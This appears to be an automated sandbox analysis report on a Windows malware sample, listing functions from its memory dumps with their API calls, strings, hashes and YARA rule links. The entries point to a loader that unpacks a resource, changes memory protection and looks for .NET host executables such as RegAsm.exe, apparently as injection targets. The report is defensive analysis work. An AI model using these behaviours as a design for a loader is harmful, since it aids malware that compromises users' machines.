Function 00AFE800, Relevance: 1.8, APIs: 1, Instructions: 335libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AFEAD7

Memory Dump Source

Source File: 00000001.00000002.947120483.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68432781dbc76070f72b6adedae1afd06f59181b6211592cfda5f75ab79b6c23
Instruction ID: 690e0e85a8fd0abfc1dc104ab77ff885a9204bdb14ac57f172e92d9204a02420
Opcode Fuzzy Hash: 68432781dbc76070f72b6adedae1afd06f59181b6211592cfda5f75ab79b6c23
Instruction Fuzzy Hash: 60C1B430B012059FCB54EBB4C8596AEBBF2BF84304F14856AE506DB3A5EF34DC458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 007899B8, Relevance: 1.6, Strings: 1, Instructions: 391COMMON

Download Yara Rule

Strings

(u, xrefs: 00789CDF

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: (u
API String ID: 0-951251120
Opcode ID: 8a27acee70180982e3f4606534a8560f0494bdfd0a6561befc9b18a0644f3b52
Instruction ID: 96569792e98f4f5a5bfeb7c4de0353c8a82572a783eddacb4fc5019a2e538343
Opcode Fuzzy Hash: 8a27acee70180982e3f4606534a8560f0494bdfd0a6561befc9b18a0644f3b52
Instruction Fuzzy Hash: 05D1CF31B412145BDB24EB7888547BEBAE7AFC9304F14C828E116EB3D4DF78AD468791

Uniqueness

Uniqueness Score: -1.00%

Function 007855E0, Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

\k, xrefs: 007857A9

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: \k
API String ID: 0-1520239229
Opcode ID: 3ac1a5bd26fe18f40588c0e187bd7acbabfe4d0b96b64a7c51c44959cd164914
Instruction ID: ad28d25bc7c1c6df0d074092f525b11e6ca0788b5b11b356e5d31ecd7afbc895
Opcode Fuzzy Hash: 3ac1a5bd26fe18f40588c0e187bd7acbabfe4d0b96b64a7c51c44959cd164914
Instruction Fuzzy Hash: 01B1A670F406189FEF15EB68C8957BEB6A6EF85310F248429E116EB3C1CB78DD818791

Uniqueness

Uniqueness Score: -1.00%

Function 00444159, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00444186

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: 15c4d00f7a4a1b91f1707f46677a34dc38f249c9a72a35aeb019871a083626e3
Instruction ID: 7ae5c02144e3a2da0f80e31c64d439ae016e5172ce781f3007fcdfed83bd6d21
Opcode Fuzzy Hash: 15c4d00f7a4a1b91f1707f46677a34dc38f249c9a72a35aeb019871a083626e3
Instruction Fuzzy Hash: 00F04F3A500119BBDF019F99EC0499B3BA9FB5A360B04442AFB1597220DB35DC61EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0078CD70, Relevance: .8, Instructions: 847COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d579dd9a2e8e750544b1506556aceab3931c54a1ff2ac5dff08c82e8423f5c95
Instruction ID: aeb622a2a22c0b6221e9ca967b7d887febc8fdd5e93228189708162331d7fe66
Opcode Fuzzy Hash: d579dd9a2e8e750544b1506556aceab3931c54a1ff2ac5dff08c82e8423f5c95
Instruction Fuzzy Hash: 53728030B012048FCB55EB74D859BADB7B3AF88311F2484A9E40ADB395EF799D428F51

Uniqueness

Uniqueness Score: -1.00%

Function 00787508, Relevance: .8, Instructions: 786COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716441c54a9d885b5f27faf2573842a8889491b375791d053193fc864f615b1e
Instruction ID: 2acc1bad1d6b90fd347404c8b04bce0cbe370913f625e63ef9392825bad2b260
Opcode Fuzzy Hash: 716441c54a9d885b5f27faf2573842a8889491b375791d053193fc864f615b1e
Instruction Fuzzy Hash: 3742E631B482148FDB09AB78D8546ADBBB2EF86310F25806AD546DB392DB38DD05C762

Uniqueness

Uniqueness Score: -1.00%

Function 0078CD6C, Relevance: .7, Instructions: 733COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b1702dadd5edce5644c6c335cc6eb042d3832058a9adce9dc777d820c71610
Instruction ID: 0d9a2d0c953676e2307735d73c2e5934cdafdb3ac61b14ad4b1edea3c85d1a40
Opcode Fuzzy Hash: 94b1702dadd5edce5644c6c335cc6eb042d3832058a9adce9dc777d820c71610
Instruction Fuzzy Hash: 57626F70A012048FCB54EB74D859BADB7B3BF88311F2484A9E40ADB394EF799D429F51

Uniqueness

Uniqueness Score: -1.00%

Function 00780388, Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c0bbc51619f7749daed97e0e92122547c201fb8af55f87d78ff08c5065a869
Instruction ID: 1c09067da490a86c8acd2805a21ce2e69544a11b74137cd27c59b3d511658a3b
Opcode Fuzzy Hash: c9c0bbc51619f7749daed97e0e92122547c201fb8af55f87d78ff08c5065a869
Instruction Fuzzy Hash: B7328530E402488FEF64EB78C4547ADB7A2EF85304F25C169D409AF396DB789D89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0078F770, Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8efce2c324437fb09bd29deb2fff726467a7bb7c6d67bbc8e8e9b6646fb1ec
Instruction ID: 4dfb13324886a6230c55a6ff2e0301b5a085e3df5a2781b17cde18bf1397b600
Opcode Fuzzy Hash: fa8efce2c324437fb09bd29deb2fff726467a7bb7c6d67bbc8e8e9b6646fb1ec
Instruction Fuzzy Hash: C5F19631E402099FCB14EFB4C88569DBBB2BF84314F248569D815EB395DB39ED42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00785150, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e87dfd1e7bc21dc0a74ff0c5e91723d37795083109a9da21bf1bcaf9b9269dd5
Instruction ID: 7df33bb0d0072a88f73ee6de2e0ce8abbf0deafca53e1183af999610b02f2be8
Opcode Fuzzy Hash: e87dfd1e7bc21dc0a74ff0c5e91723d37795083109a9da21bf1bcaf9b9269dd5
Instruction Fuzzy Hash: 6FD1F530A447458FDB20EFB9C88066BBBF2EF86314F14896AD155CB661D738DC45C791

Uniqueness

Uniqueness Score: -1.00%

Function 00788C78, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f20d744f6057b52982f9aa21d95195a75b4e0e734af8d8cf1e9bb90254bf034
Instruction ID: e005534e04fe7b64185bbbcfe9d63c973d9591d9ccfe68ba15c3f5a46117061d
Opcode Fuzzy Hash: 3f20d744f6057b52982f9aa21d95195a75b4e0e734af8d8cf1e9bb90254bf034
Instruction Fuzzy Hash: 2A91A131B412045FDB44BB759C59BBE76E7AF88304F248828E602EB394EF78ED058791

Uniqueness

Uniqueness Score: -1.00%

Function 004434F3, Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00443599
LoadLibraryW.KERNEL32(?), ref: 004435F1
LoadLibraryW.KERNEL32(004462D4), ref: 004435FA

Strings

ole32.dll, xrefs: 00443543
mscorwks.dll, xrefs: 00443512
Gdiplus.dll, xrefs: 0044353C
shfolder.dll, xrefs: 00443520
advapi32.dll, xrefs: 00443535
mscoree.dll, xrefs: 00443551
mscorjit.dll, xrefs: 0044356D
mscorrc.dll, xrefs: 00443574
mscorsec.dll, xrefs: 00443558
diasymreader.dll, xrefs: 0044354A
iphlpapi.dll, xrefs: 0044352E
sxs.dll, xrefs: 00443519
Culture.dll, xrefs: 00443566
user32.dll, xrefs: 00443527
mscordacwks.dll, xrefs: 0044355F

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: LibraryLoad$_memset
String ID: Culture.dll$Gdiplus.dll$advapi32.dll$diasymreader.dll$iphlpapi.dll$mscordacwks.dll$mscoree.dll$mscorjit.dll$mscorrc.dll$mscorsec.dll$mscorwks.dll$ole32.dll$shfolder.dll$sxs.dll$user32.dll
API String ID: 240438931-1803115895
Opcode ID: 67207a4acd7ee44246be11790712459336aa9250a79b91bab307d0672e456148
Instruction ID: 3a5597ee338a772c5accd39be1cba4925d6473433bc8e12f457eb70ed6ae4d53
Opcode Fuzzy Hash: 67207a4acd7ee44246be11790712459336aa9250a79b91bab307d0672e456148
Instruction Fuzzy Hash: 90315AB1800219EBDF10DF98D9485EEBBB4EF46719F11845AE406BB204D3B89B49CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 004447C7, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 187memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00444039: GetModuleHandleW.KERNEL32(00000000), ref: 00444042
Part of subcall function 00444039: FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00444056
Part of subcall function 00444039: SizeofResource.KERNEL32(00000000,00000000), ref: 00444064
Part of subcall function 00444039: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0044407B
Part of subcall function 00444039: LoadResource.KERNEL32(00000000,00000000), ref: 00444085

Part of subcall function 00443ED9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00443F04

GetModuleHandleA.KERNEL32(00000000), ref: 00444848
VirtualProtect.KERNEL32(00000000,00001000,00000004,?), ref: 00444868

Part of subcall function 00443F82: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00443FAD

_memset.LIBCMT ref: 0044489F

Part of subcall function 00443834: _memset.LIBCMT ref: 00443869

_memset.LIBCMT ref: 004448F7
PathFileExistsW.SHLWAPI(?), ref: 00444919
_memset.LIBCMT ref: 00444945
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0044497B
GetFileSize.KERNEL32(00000000,00000000), ref: 0044499D
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\mcsrXx9lfD.exe,00000104), ref: 004449DA
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\mcsrXx9lfD.exe,00000104), ref: 004449E7
CloseHandle.KERNEL32 ref: 00444A54

Strings

C:\Users\user\Desktop\mcsrXx9lfD.exe, xrefs: 004449E1
C:\Users\user\Desktop\mcsrXx9lfD.exe, xrefs: 004449CF

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: File$ModuleVirtual_memset$AllocHandleResource$Name$CloseCreateExistsFindLoadPathProtectSizeSizeof
String ID: C:\Users\user\Desktop\mcsrXx9lfD.exe$C:\Users\user\Desktop\mcsrXx9lfD.exe
API String ID: 3419322617-4290330924
Opcode ID: d8f0f76311271557d4e8e5a56bc78260e17dd13847f73d570ea57b9ef98a206b
Instruction ID: 0f7e0d1f2f2ebefd696345f73072d1474286785f3473bd7c935d8a7c50290e80
Opcode Fuzzy Hash: d8f0f76311271557d4e8e5a56bc78260e17dd13847f73d570ea57b9ef98a206b
Instruction Fuzzy Hash: E561CF35A41218AFEF20AFA5ED85BAB37E8AB05305F14047BE215E2251DB785E44CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00443B12, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 165fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00443B32
_memset.LIBCMT ref: 00443B98

Strings

mscoree.dll, xrefs: 00443BEA
mscoreei.dll, xrefs: 00443C5C
clr.dll, xrefs: 00443C25
mscorwks.dll, xrefs: 00443C93
C:\Users\user\Desktop\mcsrXx9lfD.exe, xrefs: 00443B4E
WINTRUST.dll, xrefs: 00443BAF

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: CreateFile_memset
String ID: C:\Users\user\Desktop\mcsrXx9lfD.exe$WINTRUST.dll$clr.dll$mscoree.dll$mscoreei.dll$mscorwks.dll
API String ID: 3830271748-4033952161
Opcode ID: 5aea5cabd1ea494e1d2f30363040f0fe473a0d496d6fcbbcdaa7907be4935aba
Instruction ID: d9f3b07101ca700a338864d609f3fefa68c44e115b5dd6c3f0bc37e291a24731
Opcode Fuzzy Hash: 5aea5cabd1ea494e1d2f30363040f0fe473a0d496d6fcbbcdaa7907be4935aba
Instruction Fuzzy Hash: 5151C41221011296FF20AF24CC81AF73262EF30F96B544566D845DB359F72BDF82C758

Uniqueness

Uniqueness Score: -1.00%

Function 004436F4, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\.NETFramework,00000000,00020019,?), ref: 0044371D
_memset.LIBCMT ref: 00443744
RegQueryValueExW.KERNEL32(?,InstallRoot,00000000,?,?,?), ref: 0044376D
_memset.LIBCMT ref: 0044378B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0044A000,000000FF,?,00000104), ref: 004437A9
RegCloseKey.KERNEL32(00000000), ref: 00443829

Strings

Software\Microsoft\.NETFramework, xrefs: 0044370D
InstallRoot, xrefs: 0044375D

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: _memset$ByteCharCloseMultiOpenQueryValueWide
String ID: InstallRoot$Software\Microsoft\.NETFramework
API String ID: 3047945766-4217373442
Opcode ID: c98935b97fe2d1060d907cd334c079acb74cdfc7f624b0edb8bfb8f3937f45cc
Instruction ID: 510a74fe024befc02972dac0dc27a70f5b2104e65e8eac7441753fefd996842b
Opcode Fuzzy Hash: c98935b97fe2d1060d907cd334c079acb74cdfc7f624b0edb8bfb8f3937f45cc
Instruction Fuzzy Hash: C531D0B6A00219ABEF209F949C45BEFB6F8EF44B14F1041A6F905E3251E7745F40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044360E, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00443660
PathFileExistsW.SHLWAPI(?), ref: 004436B8

Strings

RegSvcs.exe, xrefs: 00443643
RegAsm.exe, xrefs: 0044362E
CasPol.exe, xrefs: 0044363C
dfsvc.exe, xrefs: 00443635
jsc.exe, xrefs: 00443627

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ExistsFilePath_memset
String ID: CasPol.exe$RegAsm.exe$RegSvcs.exe$dfsvc.exe$jsc.exe
API String ID: 4214796376-2149642370
Opcode ID: 69949528fe3e4007f8bcca817740c08cd5b7161e7f0c577e5ee51e0f38d13e18
Instruction ID: aa5cabc404203a4eafa2c79b942d16a20d35a46df53f99eec62aae9a0242f471
Opcode Fuzzy Hash: 69949528fe3e4007f8bcca817740c08cd5b7161e7f0c577e5ee51e0f38d13e18
Instruction Fuzzy Hash: F121B23190020AAADF20DFA8D8986BF73B8FF45749F0140A6E847D7301E7748F458B98

Uniqueness

Uniqueness Score: -1.00%

Function 004441BE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004441FD

Part of subcall function 0044389E: GetCurrentProcess.KERNEL32 ref: 004438AB
Part of subcall function 0044389E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004438C5
Part of subcall function 0044389E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004438FD
Part of subcall function 0044389E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00443929

Strings

CRYPT32.dll, xrefs: 00444253
mscoree.dll, xrefs: 004442FF
mscoreei.dll, xrefs: 004442C7
clr.dll, xrefs: 0044428F
imagehlp.dll, xrefs: 00444216

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
String ID: CRYPT32.dll$clr.dll$imagehlp.dll$mscoree.dll$mscoreei.dll
API String ID: 1620000358-1444991907
Opcode ID: f87945901359cb7411eee88c6876cd063eb6f23d186f4a6941aa6806480cb2da
Instruction ID: ff8978445e9f4ba9d69b0c9be783ca1bb2000c88ae1a3f89227c2f6e112db486
Opcode Fuzzy Hash: f87945901359cb7411eee88c6876cd063eb6f23d186f4a6941aa6806480cb2da
Instruction Fuzzy Hash: BF41821161012295FB60AF34CC02BF77266AF75FE4B8446A6EC55C7298F76BCE82C258

Uniqueness

Uniqueness Score: -1.00%

Function 00443D94, Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00443D9D

Part of subcall function 0043D04F: __FF_MSGBANNER.LIBCMT ref: 0043D072
Part of subcall function 0043D04F: __NMSG_WRITE.LIBCMT ref: 0043D079
Part of subcall function 0043D04F: RtlAllocateHeap.NTDLL(00000000,?), ref: 0043D0C6

VirtualProtect.KERNEL32(00000000,?,00000040,00000000), ref: 00443DB4
VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 00443DC2
_memset.LIBCMT ref: 00443E03
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 00443E14
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 00443E1C
FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 00443E23

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ProtectVirtual$AllocateCacheCurrentFlushHeapInstructionProcess_malloc_memset
String ID:
API String ID: 851286602-0
Opcode ID: 1574938fe6f3cb971a174e3f95aa75c70232700e0ab2a8b015df41a28c70cff3
Instruction ID: d367fa4570b8e1ddb61eb60b4babf6fe7972fc3e50e2e93dafa9981404f73f20
Opcode Fuzzy Hash: 1574938fe6f3cb971a174e3f95aa75c70232700e0ab2a8b015df41a28c70cff3
Instruction Fuzzy Hash: DB21B6B6900204AFDB10CFA4DD89DAE7BBCEB56740B01417AF606CA292D734D604CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00444039, Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00444042
FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00444056
SizeofResource.KERNEL32(00000000,00000000), ref: 00444064
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0044407B
LoadResource.KERNEL32(00000000,00000000), ref: 00444085
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004440AC

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: Resource$Virtual$AllocFindFreeHandleLoadModuleSizeof
String ID:
API String ID: 3588284000-0
Opcode ID: 0cce930bd8a61af9f717534631c098ae97765655ae194d8f7b8fe08df6473f0e
Instruction ID: 4f1ecfd51c01300b7b741eb1a3e92248084b6c71ebf7c2427649a98654749bee
Opcode Fuzzy Hash: 0cce930bd8a61af9f717534631c098ae97765655ae194d8f7b8fe08df6473f0e
Instruction Fuzzy Hash: D001A7797407107BF7312BA55C4AF2B76ACAB86B46F100035FB01E52C1DA64CD1041BE

Uniqueness

Uniqueness Score: -1.00%

Function 004443B2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004443D2

Part of subcall function 0044389E: GetCurrentProcess.KERNEL32 ref: 004438AB
Part of subcall function 0044389E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004438C5
Part of subcall function 0044389E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004438FD
Part of subcall function 0044389E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00443929

LoadLibraryExW.KERNEL32(?,?,?), ref: 004443F2
StrStrIW.SHLWAPI(?,\system.ni.dll), ref: 00444402

Part of subcall function 004440F0: CloseHandle.KERNEL32 ref: 004440FA

Strings

\system.ni.dll, xrefs: 004443F8

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCloseCurrentEnumHandleInformationLibraryLoadModulesName_memset
String ID: \system.ni.dll
API String ID: 2189784845-482435895
Opcode ID: b96daa7f55f4356b1b6ac359a71ef35879d8a35fb3f6b61ba56806cf22f9ad65
Instruction ID: b9721e5e32d85f8fe738be80d667810e10666b0ef56e3156910d4fe3419f7875
Opcode Fuzzy Hash: b96daa7f55f4356b1b6ac359a71ef35879d8a35fb3f6b61ba56806cf22f9ad65
Instruction Fuzzy Hash: 1FF0E235900218BBEF00AFA4CC0DF8B3BACAF04341F004076BA14D6122EA34CA608BA8

Uniqueness

Uniqueness Score: -1.00%

Function 04A66940, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 04A669A0
GetCurrentThread.KERNEL32 ref: 04A669DD
GetCurrentProcess.KERNEL32 ref: 04A66A1A
GetCurrentThreadId.KERNEL32 ref: 04A66A73

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b88a09c0679563df7b84ec446c4ff455b7f929d7bf8b6dae65869ae2e7e90099
Instruction ID: 8eca1bec7943aafc944748d035a8767e7400718bb3d1bea91e8d36a593d42d03
Opcode Fuzzy Hash: b88a09c0679563df7b84ec446c4ff455b7f929d7bf8b6dae65869ae2e7e90099
Instruction Fuzzy Hash: 905144B09006498FEB10CFAAD548BDEBBF1EF88304F24845AE41AA7750D774A844CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0044389E, Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 004438AB
EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004438C5
GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004438FD
GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00443929

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName
String ID:
API String ID: 3431743260-0
Opcode ID: 7ed55397fc8b3f8a92c62f12c03d38eaca5456818af34766b87672863b6c977a
Instruction ID: e0981e6dbb744b25eef5ff997d328994195978676eae2d3d044a9a3a2741579d
Opcode Fuzzy Hash: 7ed55397fc8b3f8a92c62f12c03d38eaca5456818af34766b87672863b6c977a
Instruction Fuzzy Hash: 2021D5B554020AABEF10DF94C9819EFB7B9EF08746F104167F541E2190EBB49F41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044346C, Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 00443493
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 004434BA
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 004434C0
FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 004434C7

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 4115577372-0
Opcode ID: ed8514a78c228566c1b40abbb0b37ee22dcc45ef0549a39478286b582615dc80
Instruction ID: 4c635b92cedeab43da14c9da80292ea0080676686bcef809f20369b285ea8f7f
Opcode Fuzzy Hash: ed8514a78c228566c1b40abbb0b37ee22dcc45ef0549a39478286b582615dc80
Instruction Fuzzy Hash: D3F0A9BA800209BBDF119FA5CC48ADA7E7CEB45751F004226BA0996191C738DB50CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00443E5D, Relevance: 4.6, APIs: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00443E71
LoadLibraryA.KERNEL32 ref: 00443E7F
GetProcAddress.KERNEL32(?,?), ref: 00443EAF

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: c9ef667fd2f9803e5e8cd8fb1b9ad58c347df4563265a5797737299c8cfd6ad9
Instruction ID: f7b37c32fdf32e56eaa15eccc0f50c5423c1db99e77810c6aea50a29e6aaea61
Opcode Fuzzy Hash: c9ef667fd2f9803e5e8cd8fb1b9ad58c347df4563265a5797737299c8cfd6ad9
Instruction Fuzzy Hash: 411130756026169BEF20CF55CC8096B77F8AF05B567610066E901DB352E734EE01CA94

Uniqueness

Uniqueness Score: -1.00%

Function 0043EBD8, Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,0043D1FB), ref: 0043EBDB
__malloc_crt.LIBCMT ref: 0043EC09
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0043EC16

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 14b3d4a3d99fc5b76c89796f0575f382111ae7c7dc160ed17f087dfa453fc872
Instruction ID: fd6e1e6c5a5b72f6ad09811eac28bfc1a903dda17316cc4228822986255dd9d9
Opcode Fuzzy Hash: 14b3d4a3d99fc5b76c89796f0575f382111ae7c7dc160ed17f087dfa453fc872
Instruction Fuzzy Hash: 77F0E93B5051305E9A11BB363C4847B156CDACE3297126827F593C3281FA184C8382A8

Uniqueness

Uniqueness Score: -1.00%

Function 0044434A, Relevance: 4.5, APIs: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 00444366
LoadLibraryA.KERNEL32(?), ref: 00444373
GetProcAddress.KERNEL32(00000000,?), ref: 00444381

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 633bbec3722f7eb267180cd8858e50e53dbade99f51b311de6dcfcb46027f2b3
Instruction ID: a673462934936bb9c34516b0c21bde588fd669bd71c69f9d58389c639ecb4630
Opcode Fuzzy Hash: 633bbec3722f7eb267180cd8858e50e53dbade99f51b311de6dcfcb46027f2b3
Instruction Fuzzy Hash: 76F0C835640128EFDF216F60DC4469F7B65AFC1F517104537FC05A6156D7388951CAC8

Uniqueness

Uniqueness Score: -1.00%

Function 0078F2C8, Relevance: 4.0, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

\, xrefs: 0078F3F6
\, xrefs: 0078F301
\, xrefs: 0078F3BB

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: \$\$\
API String ID: 0-3791832595
Opcode ID: c2672def9d5749c1a203205d694ed59e43d61fc77e00fc760a4fb729c2d5a4b7
Instruction ID: c2cd850e69d9be0564ccf4fee009b0bd2aeb45843ad84afac7c625f05643442f
Opcode Fuzzy Hash: c2672def9d5749c1a203205d694ed59e43d61fc77e00fc760a4fb729c2d5a4b7
Instruction Fuzzy Hash: 7871A131B406108BCB24FF78D85566E77E2AB88764F24853ED51ADB384EB3CDC4287A0

Uniqueness

Uniqueness Score: -1.00%

